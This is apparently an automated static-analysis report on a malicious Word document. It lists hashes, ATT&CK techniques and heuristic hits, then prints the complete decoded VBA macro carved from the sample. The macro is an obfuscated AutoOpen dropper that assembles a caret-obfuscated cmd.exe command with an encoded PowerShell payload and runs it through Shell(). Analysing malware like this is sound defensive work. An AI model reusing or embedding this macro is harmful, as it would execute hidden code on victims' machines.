Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd8107d0049ce457…

MALICIOUS

Office (OLE)

98.2 KB Created: 2018-06-06 09:26:00 Authoring application: Microsoft Office Word First seen: 2018-07-04
MD5: e01b18a183b916c89e735e139100eff2 SHA-1: d250ae25d1a44908eaeb7dd9a8dbca9e1ecad45e SHA-256: dd8107d0049ce457d29050ae66b758619b8ca6267c013b430b17f99be76b64c5
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a call to Shell(), which is used to execute a command. The script attempts to construct a command string that includes encoded arguments for 'cmd.exe /V /c', suggesting it's designed to download and execute a secondary payload. The specific command construction is obfuscated but appears to be a common technique for malware droppers.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    IEEjn = Cos(uTvXP)
    SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
    izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10046 bytes
SHA-256: 1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wKjjNDCSzIPZR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SljzT()
On Error Resume Next
TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm))
nzSiYE = Cos(vrpmi)
cVEimz = CDate(MNIfH)
IjWkv = Cos(owpArb)
kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG))
ButnVM = Cos(fNUsm)
FwIrN = CDate(biNVR)
IEEjn = Cos(uTvXP)
SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
wSXij = Cos(NQpUC)
WdajY = CDate(Uifuok)
qWFkcH = Cos(klpVAw)
End Function
Sub Autoopen()
On Error Resume Next
ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR))
nEjZqQ = Cos(Ukcbwn)
HHsoK = CDate(EmrNzw)
kiwzr = Cos(SMttK)
SljzT
KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo))
kcVLOO = Cos(LzusUp)
wqAkF = CDate(YlwmLf)
khLtV = Cos(WbakFl)
End Sub


Attribute VB_Name = "mNGdnjYT"
Function aQvPhPoDb()
On Error Resume Next
znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU))
CPEwA = Cos(UBCBVo)
pKoXZh = CDate(RLSfY)
SVYiu = Cos(hXRMQ)
whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR"
ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd))
HSGYY = Cos(XVzBCn)
GGJZRH = CDate(BuJPXZ)
rblQB = Cos(NEGHO)
wCYSzhDfuVS = "jYYtlS &" + "     %^c^o^m" + "^S^p^E^c^" + "%     %^c^o^m" + "^S^p^E^c^%    " + " /V    "
QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB))
PBACKp = Cos(YptSAK)
XYLWT = CDate(KuszQ)
dhiRm = Cos(MawpS)
EMDjPu = "     " + "/c         " + "  set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s"
EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ))
XGMnjM = Cos(GzSLIs)
YGZXq = CDate(bjvoU)
djOcHw = Cos(cFMiCH)
wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s"
dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR))
LLcXP = Cos(sbwWi)
PZvRQh = CDate(DPRBGj)
rcIQN = Cos(STsZUo)
pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V"
Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs))
wjWwc = Cos(UHdbM)
AChXi = CDate(jCDTw)
zAQij = Cos(IfzQY)
cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv"
idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb))
TjTkd = Cos(oFlii)
wfQtNZ = CDate(ojnGHB)
vafzzh = Cos(LzRmDN)
ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!"
DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP))
jwHKMF = Cos(AEKziP)
hbkPot = CDate(TqaUfd)
GwOHDv = Cos(twEVn)
cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi"
icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr))
UWofft = Cos(rCqbO)
MNHHu = CDate(vhrJmO)
oLGkU = Cos(UTwts)
HwtwCz = "dYWiQwar%!" + "  -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL"
WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok))
WItBO = Cos(PoXYj)
pmGvv = CDate(wSwHS)
VVjrD = Cos(RXuiA)
XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA"
aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk
End Function
Function MdBoYR()
On Error Resume Next
ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl))
GMIGm = Cos(WdMBtA)
qLYiG = CDate(ilffbO)
hDlNIA = Cos(ZUAoj)
pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA"
NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws))
osVLkB = Cos(hjuEo)
vnhsi = CDate(bYItt)
HnmMj = Cos(bwfiF)
wfNfMK = "uAE0AZQBtAE8AU" + "gB5AF" + "MAdAByAGUA" + "YQBtA" + "F0AIABbAEMA" + "bwBO" + "AFYARQByAFQ" + "AXQA6ADoAZgB"
zXJOuU = Hex(XtdzOT + Hex(MwRVj) * 96715 + Round(scOjVD))
dpXQhD = Cos(GtMdoI)
ZiqXt = CDate(nijKw)
CHvvi = Cos(RruDG)
QvzXwAuT = "SA" + "E8AbQBiAGEAUwB" + "lADYA" + "NABTAFQAcg" + "BpAG" + "4AZwAoACcAVgB" + "WAEIAZABTADgAT" + "gBBAEUAUAB" + "3AHIAOQAzAEMAUQ" + "BCAEoA"
hPjGDF = Hex(spGSwX + Hex(bwGwI) * 24188 + Round(ZAmLw))
DXRbWY = Cos(qdahb)
SGRvpz = CDate(awUlw)
tOHPuu = Cos(boUYi)
hALRKVfp = "cwBMAEkAaA" + "BiAGEAUQA2A" + "Go" + "AWQBGA" + "GgAKwBNA" + "EYATgBMA" + "DYAaABTAE" + "MAWAB" + "5A"
MdBoYR = pWQIYs + wfNfMK + QvzXwAuT + hALRKVfp
End Function
Function jiOWRod()
On Error Resume Next
ZNRzWY = Hex(htLHE + Hex(OaDECf) * 60543 + Round(iwjOfm))
AiltQ = Cos(XKIBzM)
NACzK = CDate(jfXjSs)
TvQiiq = Cos(AjOaOn)
aUXVlPRZP = "DUA" + "cQBjAFQAZQA3AEM" + "AWgBmAHQ" + "ARgB5AEgALw" + "AzAE4ASwBuAGcAe" + "QA4AEwAdQB" + "6AE8AegBNAEw" + "AaQAyADIAa" + "QA3AGYAN" + "wBGADMASgBEAE"
rPuDE = Hex(GOitj + Hex(iFqcv) * 36406 + Round(RabtZ))
HaYjl = Cos(lWupPd)
NZtFQX = CDate(iHjJET)
NWcPV = Cos(kzthh)
XIcwT = "4AQgB" + "4AEMAawAzA" + "DYAQgBSAEcASw" + "BGAHoAaw" + "B6AEYANgBX"
SzhoQb = Hex(PFbYVL + Hex(aoztO) * 55448 + Round(TYARZ))
IvQjLX = Cos(ECwTP)
EDClzH = CDate(zuvzz)
EbwYh = Cos(qhqUo)
iIitijbGIW = "ADYAWgByAHU" + "AeAAvAEs" + "ARA" + "BrADEAQwB" + "CAFYANwBCAEcAVA" + "BQAGsATgA2" + "AFYAQwBqAFIAeQB" + "hAHAALwBxAFIAag" + "BxAGkAVgB5AE" + "QAV"
MznRXs = Hex(djXORm + Hex(KWuNz) * 36724 + Round(tTvGdO))
YANiOq = Cos(JPhWDR)
mjNhm = CDate(MUndVV)
TisLu = Cos(iFfKfD)
iDMcp = "wAwAHkAa" + "QBxAG8A" + "VQBHAFYARwA4" + "ADIASwBYAF" + "oAUQBMAEIAQQB" + "aAEg" + "AbQBBADMAWQ" + "BYAHAAU" + "gBn" + "AFYAVABWA"
QAGMrv = Hex(KGmiZ + Hex(jlENkN) * 85595 + Round(RfXWcZ))
QHWhiq = Cos(LOama)
DNrJl = CDate(uzBRZ)
KTwUi = Cos(OVSuzP)
FZEih = "GgAMABsAFIAL" + "wBvAE0AZQB" + "TAHU" + "AbABU" + "AG8AZQB6AE0AdgA" + "0AFAAVA" + "BoAG" + "QAYgAyAF"
uAUZp = Hex(wmYYEn + Hex(kZflP) * 80185 + Round(PTXPrj))
XEBJNb = Cos(rCaYL)
afmuuj = CDate(Fpphi)
SlbdE = Cos(ICbhXP)
sKEcwzRqin = "oAdQAzAFcAMA" + "BEADgAYwAwAE" + "gATgBHAC8AS" + "ABKAEgAeAA5A" + "FcAU" + "gA4AE4A" + "WABHAEUASwB" + "zADUAcwBqAEQAOA" + "BNADAA"
LEtXFN = Hex(LWjhc + Hex(KLfiO) * 38806 + Round(EJXPYV))
CbzzOi = Cos(UPLSk)
awwBu = CDate(iXwXs)
ClmCj = Cos(wjXBjW)
RtThzt = "UAB1AHAAQwAxAFM" + "AVABD" + "ACsASwA" + "5AGU"
SzSpwT = Hex(iADGN + Hex(VYmRF) * 8293 + Round(iLtQS))
hUAwZO = Cos(QbCPi)
DdoCh = CDate(pKIazF)
fQGGEC = Cos(MmvdD)
dPamZia = "ANgA0AE8AWQB0AG" + "YAKwA3AHUAV" + "wBmAHgAbwB" + "LAFEAaABV"
roFtVW = Hex(EAdqJL + Hex(cYZuDq) * 58310 + Round(IJVwNL))
RhKwDp = Cos(FOEaW)
imQzsT = CDate(oMBaNz)
fvYWJ = Cos(QivfK)
NRQMquFflW = "ADgA" + "VA" + "BJ" + "ADkAWABxAG" + "wAaQBoAE4AK"
ubTKp = Hex(UnEWtY + Hex(uQzEj) * 68901 + Round(EjVJpi))
wZvqk = Cos(kYSVCM)
sLEICA = CDate(PHRiP)
ZENFJU = Cos(MWNIf)
Gtojlzjw = "wByAGgAQg" + "BpAC" + "8AYgBVADkAag" + "BlAHkAdQBUAG4A" + "bwAwAG8AaABzA" + "HEA" + "VQBvAD" + "QAVQA5AG4AYQBK" + "AEcAaQBWA" + "HoAdgAxAGc"
jiOWRod = aUXVlPRZP + XIcwT + iIitijbGIW + iDMcp + FZEih + sKEcwzRqin + RtThzt + dPamZia + NRQMquFflW + Gtojlzjw
End Function
Function ZXjoBL()
On Error Resume Next
lVVzd = Hex(Tmssc + Hex(GpRBq) * 16443 + Round(boNjL))
LhFlW = Cos(vdtPvt)
nbwKj = CDate(ksCfp)
fFqEU = Cos(pJkSU)
mPbtAhc = "AUgBBAG" + "IATABnAE" + "MAYwB" + "vA" + "EwASQBZ" + "AHIAYQB5AFE" + "AMAB" + "6AFgAb"
AWujj = Hex(aWHhV + Hex(fihUaU) * 16831 + Round(ParsF))
YrFkY = Cos(HhJKR)
JpFTD = CDate(kAZqqV)
QJRwZf = Cos(bKoiQ)
UtWbnU = "gBNAFUAMgBlAHkA" + "NQBaADAAVQBLA" + "EkAdgAyAFkAQg" + "BWAEMAVwBKAG" + "cARw" + "BDAGYAMQBnA" + "GkANgBP" + "AEUARwBwAFYAN" + "wBSAHUAdwBVAEk"
IAizU = Hex(CWLTz + Hex(XsIEzi) * 965 + Round(AHLqik))
PcwAWC = Cos(pkScVT)
MFqUD = CDate(mtWKG)
jWAosO = Cos(rmuMSb)
pRRrF = "AZwBmAGUA" + "ZABkADgAPQA" + "nACAAKQAsACAA" + "WwBzAF" + "kAUw" + "BUAGUATQAuAEk" + "Abw" + "AuAE" + "MAbwBNAFA" + "AU"
rDYmXM = Hex(QoCVWf + Hex(tWFotn) * 42153 + Round(ovZNl))
jSsXsK = Cos(jVjmu)
QiwTW = CDate(CwQoYY)
WiOcNK = Cos(EkWJzd)
BstFCGhPM = "gBlAF" + "MAUwBpAE8A" + "bgAuAGMAb" + "wBtAHAAUgBl" + "AHMAcwBJ" + "AG8ATgB" + "NAG8ARABlA" + "F0AOgA6AEQAZQBD" + "AE8ATQBQAFI"
YJAWB = Hex(mFaqcD + Hex(idPdUw) * 10311 + Round(bUsWcT))
fMoVsM = Cos(oPRWZB)
HXAJi = CDate(bUsozX)
wpIzYj = Cos(ZOCGKS)
wIJrjnfBEB = "AZQBzAFMAKQ" + "B8AEYAbwBSA" + "EUAYQ" + "BDAGgAewAgAG4A" + "RQB3AC0AbwBCAGo" + "AZQBDAHQAIA" + "Bp" + "AG8ALgBzAHQAc"
oALwZ = Hex(VTzrN + Hex(aVLTzW) * 40507 + Round(hzHSzs))
rsVuw = Cos(omUjq)
TMcsQ = CDate(bGTOuC)
poWpst = Cos(jsdbb)
fawVXVBIBa = "gBFAGEATQBSAG" + "UAQQBEAGUAUg" + "AoACAAJABfACAAL" + "AB" + "bAFQARQB4" + "AH" + "QALgB" + "FAG4AQwBPAEQ"
Okmjqn = Hex(wBRFH + Hex(fWmsdw) * 36554 + Round(JYRzb))
ptbiBQ = Cos(XqTkX)
snoWR = CDate(CNitzA)
InFMUl = Cos(AUDZi)
RnpMap = "ASQB" + "OAEcAXQA6ADo" + "AQQBTA" + "EMASQ" + "BpACkAIAB9" + "AHwA" + "IABmAE8AcgBlA" + "EEAQwBIACAAewA" + "kAF8ALgBSAE" + "UAQQBkAFQATwBFA"
ZXjoBL = mPbtAhc + UtWbnU + pRRrF + BstFCGhPM + wIJrjnfBEB + fawVXVBIBa + RnpMap
End Function
Function zEjHZHRNrbA()
On Error Resume Next
qXHjT = Hex(GqaWU + Hex(zPZZK) * 99046 + Round(iYIfSd))
wIGYjO = Cos(OriFwa)
tmiRkK = CDate(WpbJE)
ziispC = Cos(JwkBm)
jitpJziz = "G4AZAAoACkAf" + "QApACAA" + "fAAm" + "ACgAIAA" + "kAHYAR" + "QByAEIATwB" + "zAGUAUAByAE"
NlYuT = Hex(ZlomZ + Hex(hTdcS) * 60211 + Round(fRojI))
QwGhvB = Cos(iiwjzu)
zfMLs = CDate(iHiqj)
EmHoZC = Cos(IDQSD)
bWrMsbrXqb = "UARgBFAHIAZ" + "QBO" + "AGMA" + "ZQAuAF" + "QAbwBTAFQAUgB" + "JAE4ARwAoACkA" + "WwAxACwAMwB" + "dACs"
ksjDXu = Hex(YXRAFc + Hex(zIINPB) * 31126 + Round(uXqWhi))
EhMJSH = Cos(uELwB)
hVGiz = CDate(PzvCD)
cnwLM = Cos(NwmTk)
QDoRaakXsuG = "AJ" + "wB4AC" + "cALQBqA" + "E8ASQBuAC" + "cAJwApAA=="
zEjHZHRNrbA = jitpJziz + bWrMsbrXqb + QDoRaakXsuG
End Function